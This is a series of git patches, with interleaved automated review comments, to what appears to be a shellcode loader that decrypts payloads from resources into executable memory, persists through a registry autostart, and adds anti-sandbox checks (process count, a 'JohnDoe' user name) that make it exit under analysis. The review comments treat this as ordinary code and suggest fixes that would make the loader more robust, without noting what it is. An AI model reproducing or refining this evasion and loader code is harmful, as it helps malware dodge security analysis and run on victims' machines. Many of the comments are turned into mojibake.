From 7045c5f2e420071f9d0ccfa09dfbe42b8ddbf51f Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Tue, 1 Dec 2020 16:07:29 +0800 Subject: [PATCH 1/9] Update public.hpp --- plug/public.hpp | 24 ++++++++++++++++++++---- 1 file changed, 20 insertions(+), 4 deletions(-) diff --git a/plug/public.hpp b/plug/public.hpp index 625effc..f9e825d 100644 --- a/plug/public.hpp +++ b/plug/public.hpp @@ -1,5 +1,7 @@ #include #include +#define numSandboxUser 1 +const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" }; /********************************************************************** * @Function: GetShellcodeFromRes(int resourceID, UINT &shellcodeSize) @@ -75,6 +77,9 @@ struct CONFIG **********************************************************************/ void AntiSimulation() { + WCHAR username[3267]; + DWORD charCount = 3267; + HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (INVALID_HANDLE_VALUE == hSnapshot) { @@ -86,10 +91,21 @@ void AntiSimulation() { procnum++; } - if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个 + if (procnum <= 40) //鍒ゆ柇褰撳墠杩涚▼鏄惁浣庝簬40涓紝鐩墠瑙佽繃鑳芥ā鎷熸渶澶氳繘绋嬬殑鏄疻D鑳芥ā鎷39涓 { exit(1); } + + if (!GetUserName(username, &charCount)) { + return; + } + for (int i = 0; i < numSandboxUser; ++i) { + if (wcsicmp(username, sandboxUsername[i]) == 0) { + exit(1); + } + + } + } /********************************************************************** @@ -119,11 +135,11 @@ void AutoStart() **********************************************************************/ void init(BOOL anti_sandbox, BOOL autostart) { - if (anti_sandbox) //反仿真 + if (anti_sandbox) //鍙嶄豢鐪 { AntiSimulation(); } - if (autostart) //注册表添加自启动 + if (autostart) //娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩 { AutoStart(); } 
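Review bot: In the `@@ -1,5 +1,7 @@` hunk the element count of `sandboxUsername` is a hand-maintained `#define numSandboxUser 1`; if the macro is ever raised without adding an initializer, the unfilled slots are null pointers and the `wcsicmp(username, sandboxUsername[i])` loop in AntiSimulation dereferences them. Let the array size itself: `const WCHAR* sandboxUsername[] = { L"JohnDoe" };` followed by `#define numSandboxUser (sizeof(sandboxUsername) / sizeof(sandboxUsername[0]))` (or `_countof(sandboxUsername)`), defined after the array. A one-line comment such as `// account names treated as an analysis environment; AntiSimulation exits when running as one` would say why this table exists.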
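Review bot: In the `@@ -75,6 +77,9 @@` hunk the new `WCHAR username[3267];` / `DWORD charCount = 3267;` is an unexplained magic size; the buffer GetUserName needs is documented as `UNLEN + 1` characters from `<lmcons.h>`, so `WCHAR username[UNLEN + 1]; DWORD charCount = UNLEN + 1;` states the intent, and `charCount` deserves a comment like `// in: buffer size in WCHARs, out: characters written (incl. NUL)` because it is an in/out parameter. Whether `<lmcons.h>` is already reachable through the includes at the top of the file cannot be seen here. AntiSimulation continues below this hunk.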
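Review bot: In the `@@ -86,10 +91,21 @@` hunk the new check passes a `WCHAR` buffer to `GetUserName`, which is the TCHAR-generic macro and resolves to `GetUserNameA` unless `UNICODE` is defined, and to `wcsicmp`, the legacy non-conforming name that MSVC reports as deprecated (C4996) in favour of `_wcsicmp`; use the explicit forms `if (!GetUserNameW(username, &charCount)) { return; }` and `if (_wcsicmp(username, sandboxUsername[i]) == 0) { exit(1); }` so the build does not depend on the project's character-set setting. The changed `procnum <= 40` line alters only its comment, and the new text (`鍒ゆ柇褰撳墠...`) is mojibake that looks like the file's UTF-8 bytes re-saved under code page 936; restore the `-` side text or save the file as UTF-8 with BOM so MSVC reads it consistently. The bare `return` when GetUserName fails silently skips the check, which is fine as best effort but should be marked, e.g. `// best effort: if the account name cannot be read, skip the user-name test`. AntiSimulation begins above this hunk.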
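Review bot: The two changed lines in the `@@ -119,11 +135,11 @@` hunk of init alter nothing but the comments, and the new text (`鍙嶄豢鐪`, `娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩`) is unreadable mojibake, apparently the original UTF-8 comments decoded as GBK and written back. Either drop these two lines from the commit or replace the comments with English, e.g. `// anti-emulation / sandbox checks` and `// add an autostart entry in the registry`, and fix the editor encoding so the file is saved as UTF-8. init's closing brace is outside the hunk.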
@@ -154,4 +170,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize) memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize); StreamCrypt(shellcode, shellcodeSize, config.key, 128); return shellcode; -} \ No newline at end of file +} From c28a97089f8fc4a0a63e8e009f2a194e209bf3d6 Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Tue, 1 Dec 2020 16:09:42 +0800 Subject: [PATCH 2/9] Update public.hpp --- plug/Dynamic Load/public.hpp | 20 ++++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/plug/Dynamic Load/public.hpp b/plug/Dynamic Load/public.hpp index 4ae8967..c79048b 100644 --- a/plug/Dynamic Load/public.hpp +++ b/plug/Dynamic Load/public.hpp @@ -1,5 +1,7 @@ #include #include +#define numSandboxUser 1 +const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" }; typedef LPVOID(WINAPI *pfnVirtualAlloc)(_In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize, _In_ DWORD flAllocationType, _In_ DWORD flProtect); typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR lpType); typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo); @@ -79,6 +81,8 @@ struct CONFIG **********************************************************************/ void AntiSimulation() { + WCHAR username[3267]; + DWORD charCount = 3267; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (INVALID_HANDLE_VALUE == hSnapshot) { @@ -90,10 +94,18 @@ void AntiSimulation() { procnum++; } - if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个 + if (procnum <= 40) //鍒ゆ柇褰撳墠杩涚▼鏄惁浣庝簬40涓紝鐩墠瑙佽繃鑳芥ā鎷熸渶澶氳繘绋嬬殑鏄疻D鑳芥ā鎷39涓 { exit(1); } + if (!GetUserName(username, &charCount)) { + return; + } + for (int i = 0; i < numSandboxUser; ++i) { + if (wcsicmp(username, sandboxUsername[i]) == 0) { + exit(1); + } + } } /********************************************************************** 
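Review bot: In the `@@ -1,5 +1,7 @@` hunk of plug/Dynamic Load/public.hpp the table size `numSandboxUser` is kept by hand, so bumping the macro without extending the initializer leaves null entries that the `wcsicmp` loop in AntiSimulation would dereference; derive the count from the array instead, `const WCHAR* sandboxUsername[] = { L"JohnDoe" };` with `#define numSandboxUser (sizeof(sandboxUsername) / sizeof(sandboxUsername[0]))` placed after it. This is a verbatim copy of the block added to plug/public.hpp in PATCH 1/9; a single shared header would avoid the copies drifting apart.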
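Review bot: In the `@@ -90,10 +94,18 @@` hunk the added `GetUserName(username, &charCount)` call is the TCHAR macro applied to a `WCHAR` buffer, so it only compiles in a `UNICODE` build, and `wcsicmp` is the deprecated alias of `_wcsicmp`; write `GetUserNameW(...)` and `_wcsicmp(...)` explicitly. The `procnum <= 40` line changes only its comment into mojibake (`鍒ゆ柇褰撳墠...`), which should be reverted to the `-` side text and the file saved as UTF-8. PATCH 5/9 in this series removes this block again and PATCH 9/9 re-adds it unchanged, so the same fix applies there. AntiSimulation begins above this hunk.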
@@ -123,11 +135,11 @@ void AutoStart() **********************************************************************/ void init(BOOL anti_sandbox, BOOL autostart) { - if (anti_sandbox) //反仿真 + if (anti_sandbox) //鍙嶄豢鐪 { AntiSimulation(); } - if (autostart) //注册表添加自启动 + if (autostart) //娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩 { AutoStart(); } @@ -165,4 +177,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize) memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize); StreamCrypt(shellcode, shellcodeSize, config.key, 128); return shellcode; -} \ No newline at end of file +} From 17fa875e5cc116bc2c3910d96e3fb0037267b65e Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Tue, 1 Dec 2020 16:10:36 +0800 Subject: [PATCH 3/9] Update public.hpp --- plug/Dynamic Load plus/public.hpp | 20 ++++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/plug/Dynamic Load plus/public.hpp b/plug/Dynamic Load plus/public.hpp index 4376bfc..442f8b8 100644 --- a/plug/Dynamic Load plus/public.hpp +++ b/plug/Dynamic Load plus/public.hpp @@ -1,5 +1,7 @@ #include #include +#define numSandboxUser 1 +const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" }; typedef LPVOID(WINAPI *pfnVirtualAlloc)(_In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize, _In_ DWORD flAllocationType, _In_ DWORD flProtect); typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR lpType); typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo); @@ -79,6 +81,8 @@ struct CONFIG **********************************************************************/ void AntiSimulation() { + WCHAR username[3267]; + DWORD charCount = 3267; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (INVALID_HANDLE_VALUE == hSnapshot) { 
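Review bot: The `@@ -123,11 +135,11 @@` hunk of plug/Dynamic Load/public.hpp touches init only to rewrite two comments, and both now read as mojibake (`鍙嶄豢鐪`, `娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩`), which appears to be the UTF-8 source decoded as GBK and saved back. Drop these lines from the commit or replace them with English comments such as `// anti-emulation / sandbox checks` and `// add an autostart entry in the registry`, and save the file as UTF-8. init's closing brace is outside the hunk.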
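Review bot: In the `@@ -1,5 +1,7 @@` hunk of plug/Dynamic Load plus/public.hpp the hard-coded `#define numSandboxUser 1` must be kept in step with the initializer by hand; a larger count with a shorter initializer yields null pointers that the comparison loop in AntiSimulation would pass to `wcsicmp`. Size the array from its initializer (`const WCHAR* sandboxUsername[] = { L"JohnDoe" };` and `#define numSandboxUser (sizeof(sandboxUsername) / sizeof(sandboxUsername[0]))`) and consider moving the table into one header shared by the loader variants, since PATCH 1/9 and 2/9 add identical copies.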
@@ -90,10 +94,18 @@ void AntiSimulation() { procnum++; } - if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个 + if (procnum <= 40) //鍒ゆ柇褰撳墠杩涚▼鏄惁浣庝簬40涓紝鐩墠瑙佽繃鑳芥ā鎷熸渶澶氳繘绋嬬殑鏄疻D鑳芥ā鎷39涓 { exit(1); } + if (!GetUserName(username, &charCount)) { + return; + } + for (int i = 0; i < numSandboxUser; ++i) { + if (wcsicmp(username, sandboxUsername[i]) == 0) { + exit(1); + } + } } /********************************************************************** @@ -123,11 +135,11 @@ void AutoStart() **********************************************************************/ void init(BOOL anti_sandbox, BOOL autostart) { - if (anti_sandbox) //反仿真 + if (anti_sandbox) //鍙嶄豢鐪 { AntiSimulation(); } - if (autostart) //注册表添加自启动 + if (autostart) //娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩 { AutoStart(); } @@ -228,4 +240,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize) memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize); StreamCrypt(shellcode, shellcodeSize, config.key, 128); return shellcode; -} \ No newline at end of file +} From 194f49e4db6fdbf355136cac057b00484a61c195 Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Tue, 1 Dec 2020 16:18:23 +0800 Subject: [PATCH 4/9] Update public.hpp --- plug/TLS Callback Load/public.hpp | 22 +++++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/plug/TLS Callback Load/public.hpp b/plug/TLS Callback Load/public.hpp index 0dc3e4f..4b607b7 100644 --- a/plug/TLS Callback Load/public.hpp +++ b/plug/TLS Callback Load/public.hpp @@ -1,5 +1,7 @@ #include #include +#define numSandboxUser 1 +const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" }; //shellcode memory to execute LPVOID Memory; 
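Review bot: In the `@@ -90,10 +94,18 @@` hunk of plug/Dynamic Load plus/public.hpp, `GetUserName` with a `WCHAR` buffer compiles only when `UNICODE` is defined and `wcsicmp` is the deprecated spelling of `_wcsicmp`; use `GetUserNameW(username, &charCount)` and `_wcsicmp(username, sandboxUsername[i])`. The modified `procnum <= 40` line keeps its logic but its comment has become mojibake (`鍒ゆ柇褰撳墠...`); revert the comment and save the file as UTF-8. PATCH 6/9 later deletes this block from this file again, so if that deletion is intended this hunk should be squashed away rather than fixed. AntiSimulation begins above this hunk.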
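Review bot: The `@@ -123,11 +135,11 @@` hunk of plug/Dynamic Load plus/public.hpp changes nothing in init except its two comments, which now read as mojibake (`鍙嶄豢鐪`, `娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩`), apparently UTF-8 text decoded as GBK and written back. Drop these lines from the commit or replace the comments with English, e.g. `// anti-emulation / sandbox checks` and `// add an autostart entry in the registry`. init's closing brace is outside the hunk.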
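Review bot: In the `@@ -1,5 +1,7 @@` hunk of plug/TLS Callback Load/public.hpp the element count `numSandboxUser` is maintained separately from the `sandboxUsername` initializer, so the two can silently disagree and leave null entries for the `wcsicmp` loop in AntiSimulation; derive it with `const WCHAR* sandboxUsername[] = { L"JohnDoe" };` and `#define numSandboxUser (sizeof(sandboxUsername) / sizeof(sandboxUsername[0]))` after the array. PATCH 8/9 removes these lines from this file again, so either squash the pair or keep the table in one shared header.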
@@ -77,6 +79,8 @@ struct CONFIG **********************************************************************/ void AntiSimulation() { + WCHAR username[3267]; + DWORD charCount = 3267; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (INVALID_HANDLE_VALUE == hSnapshot) { @@ -88,10 +92,18 @@ void AntiSimulation() { procnum++; } - if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个 + if (procnum <= 40) //鍒ゆ柇褰撳墠杩涚▼鏄惁浣庝簬40涓紝鐩墠瑙佽繃鑳芥ā鎷熸渶澶氳繘绋嬬殑鏄疻D鑳芥ā鎷39涓 { exit(1); } + if (!GetUserName(username, &charCount)) { + return; + } + for (int i = 0; i < numSandboxUser; ++i) { + if (wcsicmp(username, sandboxUsername[i]) == 0) { + exit(1); + } + } } /********************************************************************** @@ -121,11 +133,11 @@ void AutoStart() **********************************************************************/ void init(BOOL anti_sandbox, BOOL autostart) { - if (anti_sandbox) //反仿真 + if (anti_sandbox) //鍙嶄豢鐪 { AntiSimulation(); } - if (autostart) //注册表添加自启动 + if (autostart) //娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩 { AutoStart(); } @@ -151,8 +163,8 @@ void GetShellcodeFromRes(int resourceID, UINT &shellcodeSize) //2.Initialization memcpy(&config, pBuffer, sizeof(CONFIG)); init(config.antisandbox, config.autostart); - //3.Getshellcode //TLS回调函数中不能使用new分配内存,否则会出现访问错误,所以直接分配可执行内存 + //3.Getshellcode //TLS鍥炶皟鍑芥暟涓笉鑳戒娇鐢╪ew鍒嗛厤鍐呭瓨锛屽惁鍒欎細鍑虹幇璁块棶閿欒锛屾墍浠ョ洿鎺ュ垎閰嶅彲鎵ц鍐呭瓨 Memory = VirtualAlloc(NULL, totalSize - sizeof(CONFIG), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(Memory, (char *)pBuffer + sizeof(CONFIG), totalSize - sizeof(CONFIG)); StreamCrypt((unsigned char*)Memory, totalSize - sizeof(CONFIG), config.key, 128); -} \ No newline at end of file +} From 40da2c1bb2193d460b095b85da899b7381b3a71a Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Tue, 1 Dec 2020 18:32:45 +0800 Subject: [PATCH 5/9] Update public.hpp --- plug/Dynamic Load/public.hpp | 12 ------------ 1 file changed, 12 deletions(-) 
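Review bot: In the `@@ -88,10 +92,18 @@` hunk of plug/TLS Callback Load/public.hpp the new `GetUserName`/`wcsicmp` pair should be `GetUserNameW`/`_wcsicmp`: the generic macro only matches a `WCHAR` buffer in a `UNICODE` build and `wcsicmp` is the deprecated alias. The comment on the `procnum <= 40` line has turned into mojibake (`鍒ゆ柇褰撳墠...`) and should be reverted. Given this file's own comment that GetShellcodeFromRes runs inside a TLS callback, calling `exit(1)` from the new check runs CRT teardown under the loader lock, which the existing `procnum` exit already risks; that is worth a `// NOTE(review): exit() from a TLS callback — confirm this is safe` until it is verified. PATCH 8/9 deletes this block again, so the two commits should probably be squashed. AntiSimulation begins above this hunk.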
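Review bot: The `@@ -121,11 +133,11 @@` hunk of plug/TLS Callback Load/public.hpp rewrites two comments in init into mojibake (`鍙嶄豢鐪`, `娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩`), which looks like UTF-8 text decoded as GBK and saved back, and changes nothing else. Revert these lines or replace the comments with English, e.g. `// anti-emulation / sandbox checks` and `// add an autostart entry in the registry`, and save the file as UTF-8. init's closing brace is outside the hunk.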
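Review bot: In the `@@ -151,8 +163,8 @@` hunk the `//3.Getshellcode` comment is replaced by mojibake (`TLS鍥炶皟鍑芥暟涓笉鑳...`); the `-` side explained that `new` cannot be used in the TLS callback so executable memory is allocated directly, and that reasoning is worth keeping in English, e.g. `// 3. Get shellcode: new cannot be used inside a TLS callback, so allocate executable memory directly`. Independently of the comment, the `Memory = VirtualAlloc(...)` result on the new side is never checked before the `memcpy(Memory, ...)` that follows; add `if (Memory == NULL) { return; }` so an allocation failure does not become a write to address zero. GetShellcodeFromRes begins above this hunk.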
diff --git a/plug/Dynamic Load/public.hpp b/plug/Dynamic Load/public.hpp index c79048b..94ef7ae 100644 --- a/plug/Dynamic Load/public.hpp +++ b/plug/Dynamic Load/public.hpp @@ -1,7 +1,5 @@ #include #include -#define numSandboxUser 1 -const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" }; typedef LPVOID(WINAPI *pfnVirtualAlloc)(_In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize, _In_ DWORD flAllocationType, _In_ DWORD flProtect); typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR lpType); typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo); @@ -81,8 +79,6 @@ struct CONFIG **********************************************************************/ void AntiSimulation() { - WCHAR username[3267]; - DWORD charCount = 3267; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (INVALID_HANDLE_VALUE == hSnapshot) { @@ -98,14 +94,6 @@ void AntiSimulation() { exit(1); } - if (!GetUserName(username, &charCount)) { - return; - } - for (int i = 0; i < numSandboxUser; ++i) { - if (wcsicmp(username, sandboxUsername[i]) == 0) { - exit(1); - } - } } /********************************************************************** From 2a2a7c46081b5ba0c698e596dbf07933d0cb628b Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Tue, 1 Dec 2020 18:33:12 +0800 Subject: [PATCH 6/9] Update public.hpp --- plug/Dynamic Load plus/public.hpp | 12 ------------ 1 file changed, 12 deletions(-) diff --git a/plug/Dynamic Load plus/public.hpp b/plug/Dynamic Load plus/public.hpp index 442f8b8..6bae130 100644 --- a/plug/Dynamic Load plus/public.hpp +++ b/plug/Dynamic Load plus/public.hpp 
@@ -1,7 +1,5 @@ #include #include -#define numSandboxUser 1 -const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" }; typedef LPVOID(WINAPI *pfnVirtualAlloc)(_In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize, _In_ DWORD flAllocationType, _In_ DWORD flProtect); typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR lpType); typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo); @@ -81,8 +79,6 @@ struct CONFIG **********************************************************************/ void AntiSimulation() { - WCHAR username[3267]; - DWORD charCount = 3267; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (INVALID_HANDLE_VALUE == hSnapshot) { @@ -98,14 +94,6 @@ void AntiSimulation() { exit(1); } - if (!GetUserName(username, &charCount)) { - return; - } - for (int i = 0; i < numSandboxUser; ++i) { - if (wcsicmp(username, sandboxUsername[i]) == 0) { - exit(1); - } - } } /********************************************************************** From 5b21d354f9de4d2a9e2539dedf51c03d0e9991c8 Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Tue, 1 Dec 2020 18:33:41 +0800 Subject: [PATCH 7/9] Update public.hpp From ab025c4b3894131c0dbf8f2d879a3a475e350d90 Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Tue, 1 Dec 2020 18:34:29 +0800 Subject: [PATCH 8/9] Update public.hpp --- plug/TLS Callback Load/public.hpp | 12 ------------ 1 file changed, 12 deletions(-) diff --git a/plug/TLS Callback Load/public.hpp b/plug/TLS Callback Load/public.hpp index 4b607b7..405f39e 100644 --- a/plug/TLS Callback Load/public.hpp +++ b/plug/TLS Callback Load/public.hpp @@ -1,7 +1,5 @@ #include #include -#define numSandboxUser 1 -const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" }; //shellcode memory to execute LPVOID Memory; 
@@ -79,8 +77,6 @@ struct CONFIG **********************************************************************/ void AntiSimulation() { - WCHAR username[3267]; - DWORD charCount = 3267; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (INVALID_HANDLE_VALUE == hSnapshot) { @@ -96,14 +92,6 @@ void AntiSimulation() { exit(1); } - if (!GetUserName(username, &charCount)) { - return; - } - for (int i = 0; i < numSandboxUser; ++i) { - if (wcsicmp(username, sandboxUsername[i]) == 0) { - exit(1); - } - } } /********************************************************************** From 21e3bf4217a1e07c0d1e56e925f8c43cf5e8056b Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Tue, 1 Dec 2020 18:37:02 +0800 Subject: [PATCH 9/9] Update public.hpp --- plug/Dynamic Load/public.hpp | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/plug/Dynamic Load/public.hpp b/plug/Dynamic Load/public.hpp index 94ef7ae..03efe61 100644 --- a/plug/Dynamic Load/public.hpp +++ b/plug/Dynamic Load/public.hpp @@ -5,6 +5,9 @@ typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo); typedef HGLOBAL(WINAPI *pfnLoadResource)(HMODULE hModule, HRSRC hResInfo); typedef LPVOID(WINAPI *pfnLockResource)(HGLOBAL hResData); +#define numSandboxUser 1 +const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" }; + /********************************************************************** * @Function: GetShellcodeFromRes(int resourceID, UINT &shellcodeSize) @@ -79,6 +82,9 @@ struct CONFIG **********************************************************************/ void AntiSimulation() { + WCHAR username[3267]; + DWORD charCount = 3267; + HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (INVALID_HANDLE_VALUE == hSnapshot) { 
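Review bot: In the `@@ -5,6 +5,9 @@` hunk the re-added `#define numSandboxUser 1` is again a hand-kept count for `sandboxUsername`, so a mismatch with the initializer leaves null pointers for the `wcsicmp` loop; prefer `const WCHAR* sandboxUsername[] = { L"JohnDoe" };` with `#define numSandboxUser (sizeof(sandboxUsername) / sizeof(sandboxUsername[0]))` after it. After PATCH 5/9 through 8/9 this table now exists only in plug/public.hpp and plug/Dynamic Load/public.hpp while Dynamic Load plus and TLS Callback Load no longer carry it; if that asymmetry is intended a comment saying so would help, otherwise the table belongs in one shared header. This block is byte-identical to the one added in PATCH 1/9 to plug/public.hpp.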
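Review bot: In the `@@ -79,6 +82,9 @@` hunk the re-added `WCHAR username[3267];` / `DWORD charCount = 3267;` use an unexplained size; the documented buffer size for GetUserName is `UNLEN + 1` from `<lmcons.h>`, so `WCHAR username[UNLEN + 1]; DWORD charCount = UNLEN + 1; // in/out: size in WCHARs` is clearer, provided that header is included above (not visible here). AntiSimulation continues below this hunk.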
@@ -94,6 +100,17 @@ void AntiSimulation() { exit(1); } + + if (!GetUserName(username, &charCount)) { + return; + } + for (int i = 0; i < numSandboxUser; ++i) { + if (wcsicmp(username, sandboxUsername[i]) == 0) { + exit(1); + } + + } + } /**********************************************************************
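Review bot: In the `@@ -94,6 +100,17 @@` hunk the re-added check again calls the TCHAR macro `GetUserName` with a `WCHAR` buffer, which only compiles when `UNICODE` is defined, and the deprecated `wcsicmp`; use `if (!GetUserNameW(username, &charCount)) { return; }` and `if (_wcsicmp(username, sandboxUsername[i]) == 0) { exit(1); }`. The silent `return` on GetUserName failure should be marked as deliberate, e.g. `// best effort: skip the user-name test if the account name cannot be read`, and the stray blank line inside the `for` body can go. AntiSimulation begins above this hunk.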